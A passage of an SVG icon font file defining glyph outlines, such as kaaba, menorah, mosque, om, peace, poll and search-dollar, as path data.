c-0.645508 0.59668 -1.88281 1.08105 -2.76172 1.08105c-0.672852 0 -1.67578 -0.300781 -2.23828 -0.670898l-14.2002 -9.65039l-4.67969 112.29c-0.0898438 2.13965 -1.86035 3.83008 -4 3.83008s-3.91016 -1.69043 -4 -3.83008l-4.62012 -110.81l-12.0098 8.15918
c-1.56055 1.03027 -3.63965 0.890625 -5 -0.40918c-1.36035 -1.28027 -1.63965 -3.34082 -0.69043 -4.9502l8.54004 -14.3105l-17.9102 -3.71973c-1.85938 -0.389648 -3.18945 -2.03027 -3.18945 -3.91992s1.33008 -3.53027 3.18945 -3.91992l17.9102 -3.71973
l-8.54004 -14.3105c-0.308594 -0.521484 -0.55957 -1.43652 -0.55957 -2.04297c0 -0.950195 0.55957 -2.25293 1.25 -2.90723c0.769531 -0.709961 1.75 -1.08984 2.75 -1.08984c0.780273 0 1.55957 0.240234 2.25 0.69043l10.3701 7.04004l-1.36035 -32.71
c-25.3398 5.35938 -44.3799 27.8193 -44.3799 54.7598c0 15.04 6.00977 28.6299 15.6602 38.6904c-14.3301 11.7393 -23.6602 29.3496 -23.6602 49.3096c0 12.2598 3.62012 23.5996 9.61035 33.3398c-20.1299 -11.29 -36.3701 -28.3594 -46.3701 -49.2598l26.4199 -26.4199
c3.12012 -3.12012 3.12012 -8.19043 0 -11.3105c-1.57031 -1.55957 -3.61035 -2.33984 -5.66016 -2.33984s-4.09961 0.780273 -5.66016 2.33984zM380.8 0v64h-284.8c-16 0 -32 -12.7998 -32 -32s12.7998 -32 32 -32h284.8z" />
    <glyph glyph-name="kaaba" unicode="&#xf66b;" horiz-adv-x="576" 
d="M554.12 364.49c13.0703 -4.36035 21.8799 -16.5898 21.8799 -30.3604v-49.0098l-265 79.5098c-15.0596 4.5 -30.9502 4.5 -45.9805 0l-265.02 -79.5098v49.0098c0.000976562 12.7314 9.80273 26.332 21.8799 30.3604l235.771 78.5801
c8.15723 2.71973 21.7559 4.92676 30.3545 4.92676s22.1982 -2.20703 30.3555 -4.92676zM274.22 333.97c9 2.7207 18.5498 2.7207 27.5898 0l274.2 -82.2598v-228.39c0 -15 -10.4199 -27.9902 -25.0596 -31.2402l-242.12 -53.7998
c-5.67871 -1.2627 -15.0078 -2.28809 -20.8252 -2.28809s-15.1465 1.02539 -20.8252 2.28809l-242.12 53.7998c-14.6396 3.25977 -25.0596 16.2402 -25.0596 31.2402v228.38zM128 217.89v16.5801c0 5.28027 -5.01953 9.11035 -10.1104 7.7207l-80 -21.8203
c-3.47949 -0.950195 -5.88965 -4.11035 -5.88965 -7.71973v-16.5801c0 -5.27051 5.01953 -9.10059 10.1104 -7.7207l80 21.8203c3.47949 0.950195 5.88965 4.11035 5.88965 7.71973zM272 257.17v16.5801c0 5.28027 -5.01953 9.11035 -10.1104 7.71973l-96 -26.1797
c-3.47949 -0.950195 -5.88965 -4.11035 -5.88965 -7.71973v-16.5801c0 -5.28027 5.01953 -9.11035 10.1104 -7.7207l96 26.1807c3.47949 0.950195 5.88965 4.10938 5.88965 7.71973zM448 234.47v-16.5801v-0.00488281c0 -3.37109 2.63867 -6.82715 5.88965 -7.71484
l80 -21.8203c5.09082 -1.38965 10.1104 2.44043 10.1104 7.7207v16.5801c0 3.60938 -2.41016 6.76953 -5.88965 7.71973l-80 21.8203c-5.09082 1.38965 -10.1104 -2.44043 -10.1104 -7.7207zM304 273.74v-16.5801v-0.00585938c0 -3.37012 2.63867 -6.82617 5.88965 -7.71387
l96 -26.1807c5.09082 -1.38965 10.1104 2.44043 10.1104 7.7207v16.5791c0 3.61035 -2.41016 6.77051 -5.88965 7.7207l-96 26.1797c-5.09082 1.38965 -10.1104 -2.44043 -10.1104 -7.71973z" />
    <glyph glyph-name="khanda" unicode="&#xf66d;" horiz-adv-x="511" 
d="M415.81 382c73.71 -40.2402 111.78 -123.85 90.1602 -207.51c-7.25 -28.0898 -22.3799 -53.5703 -41.25 -75.5898l-52.5098 -61.3105c-4.87012 -5.67969 -13.04 -7.22949 -19.6504 -3.70996l-79.3496 42.2305l-29.21 -20.3408l47.0801 -32.7793
c1.66992 0.370117 3.22949 1.00977 5.00977 1.00977c13.25 0 23.9902 -10.7402 23.9902 -24c0 -13.25 -10.7402 -24 -23.9902 -24c-12.0898 0 -21.6797 9.11035 -23.3301 20.7598l-40.9102 28.4805v-30.1504c9.38086 -5.58008 15.9902 -15.3896 15.9902 -27.0996
c0 -17.6699 -14.3203 -32 -31.9795 -32c-17.6602 0 -31.9805 14.3301 -31.9805 32c0 11.7197 6.60059 21.5293 15.9902 27.0996v29.9502l-40.6299 -28.2803c-1.64062 -11.6494 -11.2305 -20.7598 -23.3301 -20.7598c-13.25 0 -23.9902 10.75 -23.9902 24
c0 13.2598 10.7402 24 23.9902 24c1.78027 0 3.33984 -0.639648 5.00977 -1.00977l47.0801 32.7793l-29.21 20.3301l-79.3496 -42.2295c-6.61035 -3.52051 -14.7803 -1.96973 -19.6504 3.71973l-55.9697 65.3604c-12.5703 14.6797 -23.3906 31.0693 -30.46 49.0596
c-35.6602 90.6904 2.95996 186.391 81.4893 229.24c6.34082 3.5 15.0205 2.63965 20.0205 -2.7002c4.99023 -5.30957 6.45996 -12.9199 2.58984 -19.0801c-16.4902 -26.1602 -25.2002 -56.3896 -25.2002 -87.4697c0.180664 -53.1904 26.7598 -102.62 71.0303 -132.18
l76.5898 -53.3301v19.8994l-44.0498 36.0908c-3.91016 4.20996 -5 10.0996 -2.81055 15.2793l7.85059 17.2402c-33.8506 19.2598 -56.9404 55.2402 -56.9404 96.9902c0 40.79 22.0205 76.1396 54.5898 95.7197l-5.21973 11.4404
c-2.33008 5.5293 -0.929688 11.8301 3.57031 16.04l58.9902 52.8096l58.9893 -52.8203c4.5 -4.20996 5.91016 -10.5098 3.57031 -16.04l-5.21973 -11.4395c32.5693 -19.5801 54.5898 -54.9199 54.5898 -95.71c0 -41.7402 -23.0996 -77.7305 -56.9404 -96.9902
l7.85059 -17.2402c2.18945 -5.18945 1.10938 -11.0801 -2.81055 -15.2793l-44.0498 -36.0908v-20.0996l76.6299 53.3496c44.5 29.7207 71.0801 79.1602 71.2705 132.41c0 31.0205 -8.70996 61.25 -25.2002 87.4102c-1.36328 2.15723 -2.46973 5.97949 -2.46973 8.53223
c0 3.51465 1.96191 8.43652 4.37988 10.9883c4.99023 5.34961 12.9902 6.51953 19.3594 3.01953zM319.82 272c0 21.3203 -10.5801 40.1201 -26.6504 51.7695l-7.83008 -17.1797c-8.75 -24.5195 -8.75 -51.04 0 -75.5596l5.65039 -12.4102
c17.3398 11.46 28.8301 31.0801 28.8301 53.3799zM191.89 272c0 -22.2998 11.5 -41.9297 28.8408 -53.3896l5.64941 12.4092c8.75 24.5303 8.75 51.04 0 75.5605l-7.83008 17.1797c-16.0801 -11.6396 -26.6602 -30.4395 -26.6602 -51.7598z" />
    <glyph glyph-name="landmark" unicode="&#xf66f;" 
d="M501.62 355.89c6.24023 -2.33984 10.3799 -8.30957 10.3799 -14.9795v-36.9102c0 -8.83984 -7.16016 -16 -16 -16h-480c-8.83984 0 -16 7.16016 -16 16v36.9102c0 6.11914 4.65039 12.8301 10.3799 14.9795l234.39 90.0703
c2.99902 1.12598 8.03223 2.04004 11.2354 2.04004s8.23633 -0.914062 11.2354 -2.04004zM64 256h64v-160h96v160h64v-160h96v160h64v-160h16c8.83984 0 16 -7.16016 16 -16v-48h-448v48c0 8.83984 7.16016 16 16 16h16v160zM496 0c8.83984 0 16 -7.16016 16 -16v-32
c0 -8.83984 -7.16016 -16 -16 -16h-480c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h480z" />
    <glyph glyph-name="mail-bulk" unicode="&#xf674;" horiz-adv-x="576" 
d="M160 0c25.5996 0 51.2002 22.4004 64 32c64 44.7998 83.2002 60.7998 96 70.4004v-134.4c0 -17.6699 -14.3301 -32 -32 -32h-256c-17.6699 0 -32 14.3301 -32 32v134.4c12.7998 -9.60059 32 -25.6006 96 -70.4004c12.7998 -9.59961 38.4004 -32 64 -32zM288 192
c17.6699 0 32 -14.3301 32 -32v-19.2002c-25.5996 -19.2002 -22.4004 -19.2002 -115.2 -86.3994c-9.59961 -3.2002 -28.7998 -22.4004 -44.7998 -22.4004s-35.2002 19.2002 -44.7998 25.5996c-92.7998 67.2002 -89.6006 67.2002 -115.2 86.4004v16
c0 17.6699 14.3301 32 32 32h256zM544 288c17.6699 0 32 -14.3301 32 -32v-192c0 -17.6699 -14.3301 -32 -32 -32h-192v134.4l-0.290039 -0.220703c-3.12012 32.4004 -30.5 57.8203 -63.71 57.8203h-96v32c0 17.6699 14.3301 32 32 32h320zM512 160v64h-64v-64h64zM160 256
v-32h-96v192c0 17.6699 14.3301 32 32 32h320c17.6699 0 32 -14.3301 32 -32v-96h-224c-35.29 0 -64 -28.71 -64 -64z" />
    <glyph glyph-name="menorah" unicode="&#xf676;" horiz-adv-x="640" 
d="M144 320c8.83984 0 16 -7.16016 16 -16v-144h-64v144c0 8.83984 7.16016 16 16 16h32zM240 320c8.83984 0 16 -7.16016 16 -16v-144h-64v144c0 8.83984 7.16016 16 16 16h32zM432 320c8.83984 0 16 -7.16016 16 -16v-144h-64v144c0 8.83984 7.16016 16 16 16h32zM528 320
c8.83984 0 16 -7.16016 16 -16v-144h-64v144c0 8.83984 7.16016 16 16 16h32zM608 352c-17.6699 0 -32 14.3301 -32 32s32 64 32 64s32 -46.3301 32 -64s-14.3301 -32 -32 -32zM512 352c-17.6699 0 -32 14.3301 -32 32s32 64 32 64s32 -46.3301 32 -64s-14.3301 -32 -32 -32
zM416 352c-17.6699 0 -32 14.3301 -32 32s32 64 32 64s32 -46.3301 32 -64s-14.3301 -32 -32 -32zM320 352c-17.6699 0 -32 14.3301 -32 32s32 64 32 64s32 -46.3301 32 -64s-14.3301 -32 -32 -32zM224 352c-17.6699 0 -32 14.3301 -32 32s32 64 32 64s32 -46.3301 32 -64
s-14.3301 -32 -32 -32zM128 352c-17.6699 0 -32 14.3301 -32 32s32 64 32 64s32 -46.3301 32 -64s-14.3301 -32 -32 -32zM32 352c-17.6699 0 -32 14.3301 -32 32s32 64 32 64s32 -46.3301 32 -64s-14.3301 -32 -32 -32zM576 160v144c0 8.83984 7.16016 16 16 16h32
c8.83984 0 16 -7.16016 16 -16v-144c0 -53.0195 -42.9805 -96 -96 -96h-192v-64h176c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-416c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h176v64h-192c-53.0195 0 -96 42.9805 -96 96
v144c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-144c0 -17.6699 14.3301 -32 32 -32h192v176c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-176h192c17.6699 0 32 14.3301 32 32z" />
    <glyph glyph-name="mosque" unicode="&#xf678;" horiz-adv-x="640" 
d="M0 -32v320h128v-320c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32zM579.16 160h-358.32c-17.8594 17.3896 -28.8398 37.3398 -28.8398 58.9102c0 52.8594 41.79 93.79 87.9199 122.899c41.9502 26.46 80.6299 57.7705 111.96 96.2207
l8.12012 9.96973l8.12012 -9.96973c31.3301 -38.4502 70.0195 -69.75 111.96 -96.2207c46.1299 -29.1094 87.9199 -70.04 87.9199 -122.899c0 -21.5703 -10.9805 -41.5205 -28.8398 -58.9102zM608 128c17.6699 0 32 -14.3301 32 -32v-128c0 -17.6699 -14.3301 -32 -32 -32
h-32v64c0 17.6699 -14.3301 32 -32 32s-32 -14.3301 -32 -32v-64h-64v72c0 48 -48 72 -48 72s-48 -24 -48 -72v-72h-64v64c0 17.6699 -14.3301 32 -32 32s-32 -14.3301 -32 -32v-64h-32c-17.6699 0 -32 14.3301 -32 32v128c0 17.6699 14.3301 32 32 32h416zM64 448
c0 0 64 -32 64 -96v-32h-128v32c0 64 64 96 64 96z" />
    <glyph glyph-name="om" unicode="&#xf679;" 
d="M360.6 387.06l-21.5801 21.5605c-1.68848 1.68652 -3.05957 4.99316 -3.05957 7.37988s1.37109 5.69336 3.05957 7.37988l21.5703 21.5605c4.08008 4.06934 10.6797 4.06934 14.7598 0l21.5801 -21.5605c1.68945 -1.68652 3.06055 -4.99316 3.06055 -7.37988
s-1.37109 -5.69336 -3.06055 -7.37988l-21.5693 -21.5605c-1.6875 -1.68848 -4.99316 -3.05957 -7.37988 -3.05957c-2.3877 0 -5.69336 1.37109 -7.38086 3.05957zM412.11 256c55.0898 0 99.8896 -44.7998 99.8896 -99.8799v-100.12c0 -48.5303 -47.4805 -88 -96.0195 -88
c-96.0205 0 -96.0205 64 -96.0205 64v37.8701c0 7.55957 9.42969 10.8896 14.2002 5.01953c15.1494 -18.6494 42.4199 -42.8896 81.8203 -42.8896c13.2393 0 32.0098 10.7695 32.0098 24v100.12c0 19.79 -16.1006 35.8799 -35.8799 35.8799
c-9.60059 0 -18.6006 -3.73047 -25.3799 -10.5l-24.25 -24.25c-18.8701 -18.8604 -43.9502 -29.25 -70.6406 -29.25h-21.6895c11.0293 -18.9004 17.8096 -40.5801 17.8096 -64c0 -70.5801 -57.4297 -128 -128.02 -128c-118.811 0 -160.03 96 -159.94 150.81
c0.0195312 8.80078 10.2598 12.7705 14.79 5.2207c22.7998 -38.0107 49.1299 -92.0303 145.15 -92.0303c35.2998 0 64.0098 28.7002 64.0098 64s-28.71 64 -64.0098 64h-33.0303c-5.57031 0.450195 -10.6406 3.49023 -13.1699 8.5498l-16.0898 32.1699
c-5.35059 10.7002 2.42969 23.2803 14.3896 23.2803h31.9004c26.4697 0 48.0098 21.5303 48.0098 48s-21.54 48 -48.0098 48c-11.25 0 -21.8203 -3.80957 -30.2705 -10.71c-5.54004 -4.53027 -13.4795 -4.50977 -19.2002 -0.209961l-26.1494 19.6299
c-8.08984 6.08008 -8.48047 17.9697 -1.12012 24.9297c25.1094 23.7402 59.8594 34.71 96.0098 28.7803c43.1602 -7.08008 79.4199 -40.6396 89.5205 -83.1895c6.43945 -27.1201 2.80957 -53.1309 -7.73047 -75.2305h46.8398c9.60059 0 18.6006 3.73047 25.3799 10.5
l24.25 24.25c18.8701 18.8604 43.9502 29.25 70.6406 29.25zM454.29 380.73c10.5596 7.95996 25.7002 0.489258 25.7002 -12.7305v-35.5195c0 -2.36035 -0.509766 -4.71094 -1.53027 -6.83008c-2.96973 -6.30078 -21.8301 -37.6602 -101.75 -37.6602
c-78.4297 0 -117.19 69.3896 -118.8 72.3398c-3.61035 6.62988 -2.08008 14.8799 3.66016 19.7998c5.69922 4.92969 14.1201 5.16992 20.1396 0.549805c3.53027 -2.69922 87.0303 -65.0693 172.58 0.0507812z" />
    <glyph glyph-name="pastafarianism" unicode="&#xf67b;" horiz-adv-x="640" 
d="M624.54 100.33c12.4004 -4.71973 18.5996 -18.5801 13.8896 -30.9805c-4.69922 -12.4092 -18.5801 -18.6299 -30.9697 -13.8799c-8.11035 3.08984 -14.3398 0.19043 -31.3896 -11.3594c-13.5508 -9.15039 -30.8301 -20.8408 -52.4199 -20.8408
c-7.16992 0 -14.8301 1.28027 -22.9707 4.39062c-32.6602 12.4395 -39.9893 41.3301 -45.3301 62.4395c-2.20996 8.7207 -3.98926 14.4902 -5.94922 18.8701c-16.6201 -13.5996 -36.9307 -25.8701 -61.6201 -34.1602c10.0098 -37 32.2793 -90.8096 60.2197 -90.8096
c13.25 0 24 -10.75 24 -24s-10.75 -24 -24 -24c-66.7402 0 -97.0498 88.6299 -107.42 129.14c-6.69043 -0.599609 -13.4199 -1.13965 -20.5801 -1.13965s-13.8896 0.540039 -20.5801 1.13965c-10.3701 -40.5098 -40.6797 -129.14 -107.42 -129.14c-13.25 0 -24 10.75 -24 24
s10.75 24 24 24c28.0801 0 50.2998 53.7998 60.2598 90.7998c-24.6895 8.29004 -45.0195 20.5605 -61.6396 34.1699c-1.95996 -4.37988 -3.74023 -10.1494 -5.9502 -18.8701c-5.34961 -21.1094 -12.6699 -50 -45.3301 -62.4395
c-8.13965 -3.11035 -15.7998 -4.39062 -22.9697 -4.39062c-21.5898 -0.0195312 -38.8701 11.6807 -52.4199 20.8408c-17.0498 11.5498 -23.2305 14.4492 -31.3906 11.3594c-12.3594 -4.72949 -26.25 1.4707 -30.9697 13.8799
c-4.71973 12.3906 1.48047 26.25 13.8701 30.9707c32.6504 12.4697 57.3398 -4.25 75.3701 -16.4502c17.0801 -11.5303 23.2998 -14.4199 31.4102 -11.3604c8.12012 3.10059 10.8301 9.37988 15.8896 29.3799c3.33008 13.1504 7.44043 29.3203 17.9502 42.6504
c-2.24023 2.91016 -4.42969 5.78027 -6.37988 8.57031c-10.1699 -9.56055 -23.4102 -17.1104 -41.7002 -17.1104c-33.9502 0 -50.8701 25.7803 -62.0596 42.8301c-10.6006 16.1396 -15 21.1699 -21.9404 21.1699c-13.25 0 -24 10.75 -24 24s10.75 24 24 24
c33.96 0 50.8799 -25.7803 62.0596 -42.8301c10.6006 -16.1396 15 -21.1699 21.9404 -21.1699c17.1504 0 37.6797 61.5596 97.2695 101.9l-17.25 34.5c-33.46 2.09961 -60.0195 29.6191 -60.0195 63.5996c0 35.3496 28.6504 64 64 64s64 -28.6504 64 -64
c0 -13.0195 -3.94043 -25.0996 -10.5996 -35.21l18.1494 -36.2998c16.9697 4.59961 35.6006 7.50977 56.46 7.50977c20.8604 0 39.4805 -2.91016 56.46 -7.50977l18.1504 36.2998c-6.67969 10.1104 -10.6201 22.1904 -10.6201 35.21c0 35.3496 28.6504 64 64 64
s64 -28.6504 64 -64c0 -33.9805 -26.5703 -61.5 -60.0098 -63.5898l-17.25 -34.5c59.7793 -40.4805 79.9502 -101.91 97.2598 -101.91c6.94043 0 11.3398 5.03027 21.9404 21.1699c11.1895 17.0498 28.1094 42.8301 62.0596 42.8301c13.25 0 24 -10.75 24 -24
s-10.75 -24 -24 -24c-6.94043 0 -11.3496 -5.03027 -21.9404 -21.1699c-11.1895 -17.0498 -28.1094 -42.8301 -62.0596 -42.8301c-18.29 0 -31.5303 7.5498 -41.7002 17.1201c-1.9502 -2.78027 -4.13965 -5.66016 -6.37988 -8.57031
c10.5098 -13.3301 14.6201 -29.5 17.9502 -42.6494c5.05957 -20 7.76953 -26.29 15.8896 -29.3809c8.16016 -3.05957 14.3506 -0.169922 31.4102 11.3604c18.0098 12.2002 42.6699 28.9697 75.3701 16.4502zM448 400c-8.82031 0 -16 -7.17969 -16 -16s7.17969 -16 16 -16
s16 7.17969 16 16s-7.17969 16 -16 16zM192 400c-8.82031 0 -16 -7.17969 -16 -16s7.17969 -16 16 -16s16 7.17969 16 16s-7.17969 16 -16 16z" />
    <glyph glyph-name="peace" unicode="&#xf67c;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM432 192c0 90.5303 -65.7695 165.82 -152 181.03v-165.66l129.43 -103.54c14.3701 26.2002 22.5703 56.2402 22.5703 88.1699zM216 10.9697v114.46
l-89.29 -71.4395c24.7998 -21.8203 55.4297 -37.0498 89.29 -43.0205zM280 125.43v-114.449c33.8604 5.96973 64.4902 21.1992 89.29 43.0195zM216 373.03c-86.2305 -15.21 -152 -90.5 -152 -181.03c0 -31.9297 8.2002 -61.9697 22.5703 -88.1699l129.43 103.54v165.66z" />
    <glyph glyph-name="place-of-worship" unicode="&#xf67f;" horiz-adv-x="640" 
d="M620.61 81.4502c10.7031 -4.58887 19.3896 -17.7646 19.3896 -29.4102v-100.04c0 -8.83984 -7.16016 -16 -16 -16h-112v192zM0 52.04c0 11.6455 8.68652 24.8213 19.3896 29.4102l108.61 46.5498v-192h-112c-8.83984 0 -16 7.16016 -16 16v100.04zM464.46 201.32
c9.63965 -5.78027 15.54 -16.2002 15.54 -27.4404v-237.88h-96v96c0 35.3496 -28.6602 64 -64 64s-64 -28.6504 -64 -64v-96h-96v237.88c0 10.0029 6.96191 22.2959 15.54 27.4404l48.46 29.0801v114.97c0 8.49023 3.37988 16.6299 9.37988 22.6299l75.3105 75.3096
c6.23926 6.25 16.3691 6.25 22.6191 0l75.3105 -75.3096c6.00977 -6.00977 9.37988 -14.1396 9.37988 -22.6299v-114.97z" />
    <glyph glyph-name="poll" unicode="&#xf681;" horiz-adv-x="448" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM160 80v128c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-128c0 -8.83984 7.16016 -16 16 -16h32
c8.83984 0 16 7.16016 16 16zM256 80v224c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-224c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16zM352 80v64c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-64
c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16z" />
    <glyph glyph-name="poll-h" unicode="&#xf682;" horiz-adv-x="448" 
d="M448 16c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48v-352zM112 256h128c8.83984 0 16 7.16016 16 16v32c0 8.83984 -7.16016 16 -16 16h-128c-8.83984 0 -16 -7.16016 -16 -16v-32
c0 -8.83984 7.16016 -16 16 -16zM112 160h224c8.83984 0 16 7.16016 16 16v32c0 8.83984 -7.16016 16 -16 16h-224c-8.83984 0 -16 -7.16016 -16 -16v-32c0 -8.83984 7.16016 -16 16 -16zM112 64h64c8.83984 0 16 7.16016 16 16v32c0 8.83984 -7.16016 16 -16 16h-64
c-8.83984 0 -16 -7.16016 -16 -16v-32c0 -8.83984 7.16016 -16 16 -16z" />
    <glyph glyph-name="pray" unicode="&#xf683;" horiz-adv-x="383" 
d="M256 320c-35.3496 0 -64 28.6504 -64 64s28.6504 64 64 64s64 -28.6504 64 -64s-28.6504 -64 -64 -64zM225.37 150.25l-24.1504 28.7598l-34.7998 -64.8701l109.86 -109.859c25.4893 -25.4902 5.7998 -68.2803 -28.2803 -68.2803h-208c-22.0898 0 -40 17.9102 -40 40
s17.9102 40 40 40h91.5596l-44.8096 34.8896c-42.8799 27.3799 -57.5898 80.1104 -34.1904 123.75l49.3701 92.0303c11.1201 20.6504 32.1807 34.4404 56.3701 36.9199c24.7803 2.58984 48.5605 -6.93945 64 -25.3301l38.9102 -46.3096l57.4404 47
c17.1191 13.9697 42.3398 11.4902 56.3096 -5.62012c13.9697 -17.0898 11.4697 -42.2998 -5.62012 -56.2803l-88 -72.0195c-16.9697 -13.8701 -41.9102 -11.5 -55.9697 5.21973z" />
    <glyph glyph-name="praying-hands" unicode="&#xf684;" horiz-adv-x="640" 
d="M272 256.09c17.5996 0 32 -14.3994 32 -32v-128c0 -51.8896 -34.8398 -98.0801 -84.75 -112.35l-179.19 -46.6201c-2.64941 -0.69043 -5.36914 -1.03027 -8.05957 -1.03027c-23.4805 0 -32 21.1797 -32 32v96v0.0117188c0 12.7285 9.80176 26.3203 21.8799 30.3389
l90.1201 30.04v80.2295c0 18.9805 5.55957 37.3896 16.1201 53.2305l117.26 175.899c0.169922 0.270508 0.589844 0.25 0.790039 0.480469c9.58008 13.5098 27.8496 17.8799 42.2998 9.20996c15.1602 -9.10059 20.0605 -28.75 10.9707 -43.9102l-77.75 -129.59
c-8.9707 -14.9199 -13.6904 -32 -13.6904 -49.3906v-76.5498c0 -8.83984 7.16016 -16 16 -16s16 7.16016 16 16v80c0 17.6006 14.4004 32 32 32zM618.12 94.3604c13.0703 -4.36035 21.8799 -16.5801 21.8799 -30.3506v-96c0 -10.8193 -8.51953 -32 -32 -32
c-2.67969 0 -5.40039 0.339844 -8.05957 1.03027l-179.19 46.6201c-49.9102 14.2598 -84.75 60.4502 -84.75 112.34v128c0 17.5996 14.4004 32 32 32s32 -14.4004 32 -32v-80c0 -8.83984 7.16016 -16 16 -16s16 7.16016 16 16v76.5498
c0 17.3906 -4.71973 34.4697 -13.6904 49.3906l-77.75 129.59c-9.08984 15.1602 -4.18945 34.8193 10.9707 43.9102c14.4502 8.66992 32.7197 4.2998 42.2998 -9.20996c0.200195 -0.240234 0.610352 -0.210938 0.790039 -0.480469l117.26 -175.89
c10.5605 -15.8408 16.1201 -34.25 16.1201 -53.2305v-80.2295z" />
    <glyph glyph-name="quran" unicode="&#xf687;" horiz-adv-x="448" 
d="M448 89.5996c0 -9.59961 -3.2002 -16 -9.59961 -19.1992c-3.2002 -12.8008 -3.2002 -57.6006 0 -73.6006c6.39941 -6.39941 9.59961 -12.7998 9.59961 -19.2002v-16c0 -16 -12.7998 -25.5996 -25.5996 -25.5996h-326.4c-54.4004 0 -96 41.5996 -96 96v320
c0 54.4004 41.5996 96 96 96h326.4c16 0 25.5996 -9.59961 25.5996 -25.5996v-332.801zM301.08 302.18l-11.1904 -22.6494l-24.9893 -3.62988c-2.68066 -0.390625 -3.75 -3.66992 -1.81055 -5.56055l18.0898 -17.6299l-4.26953 -24.8896
c-0.360352 -2.11035 1.30957 -3.82031 3.20996 -3.82031c0.5 0 1.01953 0.120117 1.51953 0.379883l22.3604 11.75l22.3604 -11.75c0.5 -0.259766 1.01953 -0.379883 1.51953 -0.379883c1.90039 0 3.57031 1.70996 3.20996 3.82031l-4.26953 24.8896l18.0898 17.6299
c1.92969 1.89062 0.859375 5.16992 -1.81055 5.56055l-25 3.62988l-11.1797 22.6494c-0.599609 1.20996 -1.75977 1.82031 -2.91992 1.82031s-2.32031 -0.610352 -2.91992 -1.82031zM243.19 371.19c-63.5205 0 -115.19 -51.6709 -115.19 -115.19
c0 -63.5098 51.6699 -115.19 115.18 -115.18c13.6006 0 27.1201 2.46973 40.1904 7.33984c2.67969 0.910156 4.62012 3.43945 4.62012 6.41992c0 3.63965 -2.87012 6.78027 -6.7998 6.78027c-0.650391 0 -3.10059 -0.209961 -4.13086 -0.209961
c-52.3096 0 -94.8594 42.5596 -94.8594 94.8594c0 52.3105 42.5498 94.8604 94.8594 94.8604c1.04004 0 3.45996 -0.209961 4.13086 -0.209961c0.633789 -0.237305 1.69727 -0.429688 2.375 -0.429688c3.73926 0 6.77441 3.03516 6.77441 6.77441
c0 3.7373 -3.03223 6.77246 -6.76953 6.77539c-13.1201 4.91992 -26.71 7.41016 -40.3799 7.41016zM380.8 0v64h-284.8c-16 0 -32 -12.7998 -32 -32s12.7998 -32 32 -32h284.8z" />
    <glyph glyph-name="search-dollar" unicode="&#xf688;" 
d="M505.04 5.33984c9.2998 -9.39941 9.2998 -24.5898 -0.0996094 -33.9902l-28.3008 -28.2998c-9.2998 -9.39941 -24.5 -9.39941 -33.8994 0l-99.71 99.6904c-4.5 4.5 -7 10.5996 -7 17v16.2998c-35.2998 -27.5996 -79.71 -44 -128.011 -44
c-114.909 0 -208.02 93.0898 -208.02 207.979c0 114.891 93.1201 207.98 208.02 207.98c114.9 0 208.011 -93.0898 208.011 -207.98c0 -48.2998 -16.4004 -92.6895 -44 -127.989h16.2998c6.40039 0 12.5 -2.5 17 -7zM208.02 96.04c79.6504 0 144 64.4502 144 143.979
c0 79.6406 -64.46 143.98 -144 143.98c-79.6494 0 -144 -64.4502 -144 -143.98c0 -79.6396 64.4609 -143.979 144 -143.979zM235.13 248.58c18.6006 -5.58008 31.5898 -23.4199 31.5898 -43.3896c0 -24.5303 -19.0498 -44.4404 -42.6797 -45.0703v-16.1201
c0 -4.41992 -3.58008 -8 -8 -8h-16c-4.41992 0 -8 3.58008 -8 8v16.29c-11.29 0.580078 -22.2705 4.51953 -31.3701 11.3496c-3.90039 2.93066 -4.09961 8.77051 -0.570312 12.1406l11.75 11.21c2.77051 2.63965 6.89062 2.75977 10.1309 0.729492
c3.85938 -2.42969 8.25977 -3.71973 12.8193 -3.71973h28.1006c6.5 0 11.7998 5.91992 11.7998 13.1904c0 5.94922 -3.61035 11.1797 -8.77051 12.7295l-45.0098 13.5c-18.5898 5.58008 -31.5801 23.4199 -31.5801 43.3896c0 24.5205 19.0498 44.4404 42.6797 45.0703
v16.1201c0 4.41992 3.58008 8 8 8h16c4.4209 0 8 -3.58008 8 -8v-16.29c11.29 -0.580078 22.2705 -4.51953 31.3701 -11.3496c3.90039 -2.93066 4.10059 -8.77051 0.570312 -12.1406l-11.75 -11.21c-2.76953 -2.63965 -6.88965 -2.75977 -10.1299 -0.729492
c-3.86035 2.42969 -8.25977 3.71973 -12.8203 3.71973h-28.1094c-6.5 0 -11.8008 -5.91992 -11.8008 -13.1904c0 -5.94922 3.61035 -11.1797 8.77051 -12.7295z" />
    <glyph glyph-name="search-location" unicode="&#xf689;" 
d="M505.04 5.33984c9.2998 -9.39941 9.2998 -24.5898 -0.0996094 -33.9902l-28.3008 -28.2998c-9.2998 -9.39941 -24.5 -9.39941 -33.8994 0l-99.71 99.6904c-4.5 4.5 -7 10.5996 -7 17v16.2998c-35.2998 -27.5996 -79.71 -44 -128.011 -44
c-114.909 0 -208.02 93.0898 -208.02 207.979c0 114.891 93.1201 207.98 208.02 207.98c114.9 0 208.011 -93.0898 208.011 -207.98c0 -48.2998 -16.4004 -92.6895 -44 -127.989h16.2998c6.40039 0 12.5 -2.5 17 -7zM208.02 96.04c79.6504 0 144 64.4502 144 143.979
